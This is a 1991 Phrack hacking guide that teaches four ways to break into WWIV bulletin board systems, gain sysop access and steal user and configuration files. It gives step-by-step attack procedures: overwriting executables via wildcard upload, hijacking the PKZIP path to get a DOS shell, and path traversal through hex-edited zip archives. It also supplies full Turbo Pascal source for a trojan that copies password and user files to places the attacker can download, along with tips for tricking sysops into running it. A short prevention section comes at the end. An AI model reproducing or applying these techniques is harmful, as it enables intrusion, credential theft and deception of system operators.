| ==Phrack Inc.== | |
| Volume Three, Issue Thirty-four, File #5 of 11 | |
| *** *** | |
| *** *** | |
| *** The Complete Guide *** | |
| *** to Hacking WWIV *** | |
| *** *** | |
| *** by Inhuman *** | |
| *** September 1991 *** | |
| *** *** | |
| *** *** | |
| WWIV is one of the most popular BBS programs in the country. With | |
| thousands of boards in WWIVnet and hundreds in the spinoff WWIVlink, there is a | |
| lot of support and community. The nice thing about WWIV is that it is very | |
| easy to set up. This makes it popular among the younger crowd of sysops who | |
| can't comprehend the complexities of fossil drivers and batch files. In this | |
| file, I will discuss four methods of hacking WWIV to achieve sysop access and | |
| steal the user and configuration files. Just remember the number one rule | |
| of hacking: Don't destroy, alter, or create files on someone else's computer, | |
| unless it's to cover your own trail. Believe me, there is nothing lower than | |
| the scum who hack BBSes for the sheer pleasure of formatting someone else's | |
| hard drive. But there is nothing wrong (except legally) with hacking a system | |
| to look at the sysop's files, get phone numbers, accounts, etc. Good luck. | |
| *** | |
| *** Technique #1: The Wildcard Upload | |
| *** | |
| This technique will only work on a board running an unregistered | |
| old version of DSZ and a version of WWIV previous to v4.12. It is all | |
| based on the fact that if you do a wildcard upload (*.*), whatever file you | |
| upload will go into the same directory as DSZ.COM, which is often the main BBS | |
| directory. So there are several methods of hacking using this technique. | |
| If the sysop is running an unmodified version of WWIV, you can simply | |
| compile a modded version of it with a backdoor and overwrite his copy. Your | |
| new copy will not be loaded into memory until the BBS either shrinks out (by | |
| running an onliner or something), or the sysop terminates the BBS and runs it | |
| again. | |
| You can also have some fun with two strings that WWIV always recognizes at | |
| the NN: prompt: "!@-NETWORK-@!" and "!@-REMOTE-@!". The first is used by | |
| WWIVnet to tell the BBS that it is receiving a net call. If the BBS is part of | |
| a network and you type "!@-NETWORK-@!", it will then wait for the network | |
| password and other data. If the board is not part of a network, it will just | |
| act like you typed an invalid user name. The second string is reserved for | |
| whatever programs people wanted to write for WWIV, like an off-line reader or | |
| whatever. Snarf (the file leeching utility) uses this. If there is not a | |
| REMOTE.EXE or REMOTE.COM in the main BBS directory, it will also act as if you | |
| entered an invalid user name. So, what you can do is wildcard upload either | |
| REMOTE.COM or NETWORK.COM. You want to call them COM files, because if the EXE | |
| files already exist, the COM ones will be called first. If the BBS is part of | |
| a network, you should go for REMOTE.COM, because if you do NETWORK.COM, it will | |
| screw up network communications and the sysop will notice a lot faster. Of | |
| course, if you're going straight in for the kill, it doesn't matter. | |
| So, what should NETWORK.COM or REMOTE.COM actually be? you ask. Well, you | |
| can try renaming COMMAND.COM to one of those two, which would make a DOS shell | |
| for you when it was executed. This is tricky, though, because you need to know | |
| his DOS version. I suggest a batch file, compiled to a COM file using PC Mag's | |
| BAT2EXEC. You can make the batch file have one line: | |
| \COMMAND | |
| That way you don't have to worry about DOS versions. | |
| Remember that this method of hacking WWIV is almost completely obsolete. | |
| It is just included for reference, or for some old board run from an empty | |
| house where the sysop logs on twice a year or something. | |
| *** | |
| *** Technique #2: The PKZIP Archive Hack | |
| *** | |
| Probably the most vulnerable part of WWIV is the archive section. This | |
| section allows users to unZIP files to a temporary directory and ZIP the files | |
| you want into a temporary ZIP file, then download it. This is useful if you | |
| download a file from another board, but one file in it is corrupted. This way | |
| you don't have to re-download the whole file. Anyway, on with the show. Make | |
| a zip file that contains a file called PKZIP.BAT or COM or EXE. It doesn't | |
| matter. This file will be executed, so make it whatever you want, just like in | |
| Technique #1. Make it COMMAND.COM, or a batch file, or a HD destroyer, | |
| whatever you want. So you upload this file, and then type "E" to extract it. | |
| It'll ask you what file to extract and you say the name of the file you just | |
| uploaded. It'll then say "Extract What? " and you say "*.*". It'll then unzip | |
| everything (your one file) into the TEMP directory. Then go to the archive | |
| menu ("G") and pick "A" to add a file to archive. It'll ask what file you want | |
| to add, and say anything, it doesn't matter. At this point it will try to | |
| execute the command: | |
| PKZIP TEMP.ZIP \TEMP\%1 | |
| Where %1 is what you just entered. The file pointer is already pointing | |
| to the temp directory, so instead of executing PKZIP from the DOS path, it'll | |
| execute the file sitting in the current directory, TEMP. So then it runs PKZIP | |
| and you get your DOS shell or whatever. | |
| If PKZIP does not work, you may want to try uploading another file, and | |
| use the same technique, but instead make it an ARC file and call the file in | |
| the archive PKPAK. | |
| This technique is relatively easy to defeat from the sysop's end, but | |
| often they are too lazy, or just haven't heard about it. | |
| *** | |
| *** Technique #3: The -D Archive Hack | |
| *** | |
| This technique also plays on the openness of WWIV's archive system. This | |
| is another method of getting a file into the root BBS directory, or anywhere on | |
| the hard drive, for that matter. | |
| First, create a temporary directory on your hard drive. It doesn't matter | |
| what it's called. We'll call it TEMP. Then, make a sub-directory of TEMP | |
| called AA. It can actually be called any two-character combination, but we'll | |
| keep it nice and simple. Then make a subdirectory of AA called WWIV. | |
| Place NETWORK.COM or REMOTE.COM or whatever in the directory | |
| \TEMP\AA\WWIV. Then from the TEMP directory execute the command: | |
| PKZIP -r -P STUFF.ZIP <--- The case of "r" and "P" are important. | |
| This will create a zip file of all the contents of the directories, but | |
| with all of the directory names recursed and stored. So if you do a PKZIP -V | |
| to list the files you should see AA\WWIV\REMOTE.COM, etc. | |
| Next, load STUFF.ZIP into a hex editor, like Norton Utilities, and search | |
| for "AA". When you find it (it should occur twice), change it to "C:". It is | |
| probably a good idea to do this twice, once with the subdirectory called WWIV, | |
| and another with it called BBS, since those are the two most common main BBS | |
| directory names for WWIV. You may even want to try D: or E: in addition to C:. | |
| You could even work backwards, by forgetting the WWIV subdirectory, and just | |
| making it AA\REMOTE.COM, and changing the "AA" to "..". This would be | |
| foolproof. You could work from there, doing "..\..\DOS\PKZIP.COM" or whatever. | |
| Then upload STUFF.ZIP (or whatever you want to call it) to the BBS, and | |
| type "E" to extract it to a temporary directory. It'll ask you what file. | |
| Type "STUFF.ZIP". It'll ask what you want to extract. Type """-D". It'll | |
| then execute: | |
| PKUNZIP STUFF.ZIP ""-D | |
| It will unzip everything into the proper directory. Voila. The quotation | |
| marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check | |
| for the hyphen. This method can only be defeated by modifying the source code, | |
| or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you | |
| lose your archive section. | |
| *** | |
| *** Technique #4: The Trojan Horse File-Stealer | |
| *** | |
| This method, if executed properly, is almost impossible to defeat, and | |
| will conceivably work on any BBS program, if you know the directory structure | |
| well enough. Once again, you need PC Mag's BAT2EXEC, or enough programming | |
| experience to write a program that will copy files from one place to another. | |
| The basic principle is this: You get the sysop to run a program that you | |
| upload. This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over* | |
| files that already exist in the transfer or gfiles area. You then go download | |
| those files and you have the two most important files that exist for WWIV. | |
| Now, you need to do a certain amount of guess-work here. WWIV has it's | |
| directories set up like this: | |
| --- TEMP | |
| I --- DIR1 | |
| I I | |
| I--- DLOADS---I--- DIR2 | |
| I I | |
| I --- DIR3 | |
| WWIV--I--- DATA | |
| I --- GDIR1 | |
| I I | |
| I--- GFILES---I--- GDIR2 | |
| I I | |
| I --- GDIR3 | |
| --- MSGS | |
| The sysop sets the names for the DIR1, DIR2, etc. Often you have names | |
| like UPLOADS, GAMES, UTILS, etc. For the gfile dirs you might have GENERAL, | |
| HUMOR, whatever. | |
| So you have to make a guess at the sysop's directory names. Let's say he | |
| never moves his files from the upload directory. Then do a directory list from | |
| the transfer menu and pick two files that you don't think anyone will download. | |
| Let's say you see: | |
| RABBIT .ZIP 164k : The History of Rabbits from Europe to the U.S. | |
| SCD .COM 12k : SuperCD - changes dirs 3% faster than DOS's CD! | |
| So you then might write a batch file like this: | |
| @ECHO OFF | |
| COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP | |
| COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP | |
| COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM | |
| COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM | |
| You'd then compile it to a COM file and upload it to the sysop directory. | |
| Obviously this file is going to be pretty small, so you have to make up | |
| plausible use for it. You could say it's an ANSI screen for your private BBS, | |
| and the sysop is invited. This is good if you have a fake account as the | |
| president of some big cracking group. You wouldn't believe how gullible some | |
| sysops are. At any rate, use your imagination to get him to run the file. And | |
| make it sound like he shouldn't distribute it, so he won't put it in some | |
| public access directory. | |
| There is a problem with simply using a batch file. The output will look | |
| like: | |
| 1 file(s) copied. | |
| File not found. | |
| 1 file(s) copied. | |
| File not found. | |
| That might get him curious enough to look at it with a hex editor, which | |
| would probably blow everything. That's why it's better to write a program in | |
| your favorite language to do this. Here is a program that searches specified | |
| drives and directories for CONFIG.DAT and USER.LST and copies them over the | |
| files of your choice. It was written in Turbo Pascal v5.5: | |
| Program CopyThisOverThat; | |
| { Change the dir names to whatever you want. If you change the number of | |
| locations it checks, be sure to change the "num" constants as well } | |
| uses dos; | |
| const | |
| NumMainDirs = 5; | |
| MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD', | |
| 'BOARD','WAR'); | |
| NumGfDirs = 3; | |
| GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS'); | |
| NumSubGFDirs = 2; | |
| SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC'); | |
| NumDirsToTest = 3; | |
| DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\'); | |
| {ok to test for one that doesn't exist} | |
| {Source file names include paths from the MAIN BBS subdir (e.g. "BBS") } | |
| SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA | |
| T'); | |
| { Dest file names are from subgfdirs } | |
| DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP'); | |
| var | |
| p, q, r, x, y, dirN: byte; | |
| bigs: word; | |
| CurDir, BackDir: string[80]; | |
| f1, f2: file; | |
| Info: pointer; | |
| ok: boolean; | |
| Procedure Sorry; | |
| var | |
| x, y: integer; | |
| begin | |
| for y := 1 to 1000 do | |
| for x := 1 to 100 do | |
| ; | |
| Writeln; | |
| Writeln ('<THIS IS DISPLAYED WHEN FINISHED>'); {change to something like } | |
| Writeln; {Abnormal program termination} | |
| ChDir(BackDir); | |
| Halt; | |
| end; | |
| begin | |
| Write ('<THIS IS DISPLAYED WHILE SEARCHING>'); {change to something like } | |
| {$I-} {Loading...} | |
| GetDir (0, BackDir); | |
| ChDir('\'); | |
| for dirn := 1 to NumDirsToTest do | |
| begin | |
| ChDir(DirsToTest[dirn]); | |
| if IOResult = 0 then | |
| begin | |
| for p := 1 to NumMainDirs do | |
| begin | |
| ChDir (MainDirs[p]); | |
| if (IOResult <> 0) then | |
| begin | |
| if (p = NumMainDirs) and (dirn = NumDirsToTest) then | |
| Sorry; | |
| end else begin | |
| p := NumMainDirs; | |
| for q := 1 to NumGFDirs do | |
| begin | |
| ChDir (GFDirs[q]); | |
| if (IOResult <> 0) then | |
| begin | |
| if (q = NumGFDirs) and (dirn=NumdirsToTest) then | |
| Sorry; | |
| end else begin | |
| q := NumGFDirs; | |
| for r := 1 to NumSubGFDirs do | |
| begin | |
| ChDir (SubGFDirs[r]); | |
| if (IOResult <> 0) then | |
| begin | |
| if r = NumSubGFDirs then | |
| Sorry; | |
| end else begin | |
| r := NumSubGFDirs; | |
| dirn := NumDirsToTest; | |
| ok := true; | |
| end; | |
| end; | |
| end; | |
| end; | |
| end; | |
| end; | |
| end; | |
| end; | |
| GetDir (0, CurDir); | |
| ChDir ('..'); | |
| ChDir ('..'); | |
| for x := 1 to 2 do | |
| begin | |
| Assign (f1, SourceFileNames[x]); | |
| Assign (f2, CurDir+DestFileNames[x]); | |
| Reset (f1, 1); | |
| if IOResult <> 0 then | |
| begin | |
| if x = 2 then | |
| Sorry; | |
| end else begin | |
| ReWrite (f2, 1); | |
| Bigs := FileSize(f1); | |
| GetMem(Info, Bigs); | |
| BlockRead(f1, Info^, Bigs); | |
| BlockWrite (f2, Info^, Bigs); | |
| FreeMem(Info, Bigs); | |
| end; | |
| end; | |
| Sorry; | |
| end. | |
| So hopefully the sysop runs this program and emails you with something | |
| like "Hey it didn't work bozo!". Or you could make it work. You could | |
| actually stick a BBS ad in the program or whatever. It's up to you. At any | |
| rate, now you go download those files that it copied the USER.LST and | |
| CONFIG.DAT over. You can type out the CONFIG.DAT and the first word you see in | |
| all caps is the system password. There are several utilities for WWIV that let | |
| you compile the USER.LST to a text file. You can find something like that on a | |
| big WWIV board, or you can try to figure it out with a text or hex editor. At | |
| any rate, once you have those two files, you're in good shape. | |
| You could also use a batch file like that in place of one that calls | |
| COMMAND.COM for something like REMOTE.COM. It's up to you. | |
| *** | |
| *** Hacking Prevention | |
| *** | |
| So you are the sysop of a WWIV board, and are reading this file with | |
| growing dismay. Have no fear, if you have patience, almost all of these | |
| methods can be fixed. | |
| To eliminate the wildcard upload, all you have to do it get a current copy | |
| of WWIV (4.20), and the latest version of DSZ. It's all been fixed. To fix | |
| the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP, | |
| PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have. So your | |
| command lines should look like: | |
| \DOS\PKZIP -V %1 | |
| Or something similar. That will fix that nicely. To eliminate the -D | |
| method, you have to make some modifications to the source code if you want to | |
| keep your archive section. Goose, sysop of the Twilight Zone BBS in VA, | |
| puts out a NOHACK mod, which is updated regularly. It fixes ALL of these | |
| methods except the last. The latest version of NOHACK is v2.4. If you are a | |
| WWIV sysop, put it in. | |
| I can think of two ways to stop the last method, but neither of them are | |
| easy, and both require source code modifications. You could keep track of the | |
| filesize of a file when it's uploaded. Then when someone goes to download it, | |
| you could check the actual filesize with the size when it was uploaded. If | |
| they differ, it wouldn't let you download it. You could do the same with the | |
| date. Although either method could be gotten around with enough patience. | |
| For a virtually unhackable system, voice validate all users, have all | |
| uploads go to the sysop directory so you can look over them first, and don't | |
| run any programs. Of course, this is very tedious, but that is the price | |
| of a secure BBS. | |
| *** | |
| *** Thanks | |
| *** | |
| Thanks to Fenris Wolf for teaching me about the -D method, to Steve | |
| for help with the CopyThisOverThat program, and to Insight for proofing this | |
| file. | |
| ******************************************************************************* | |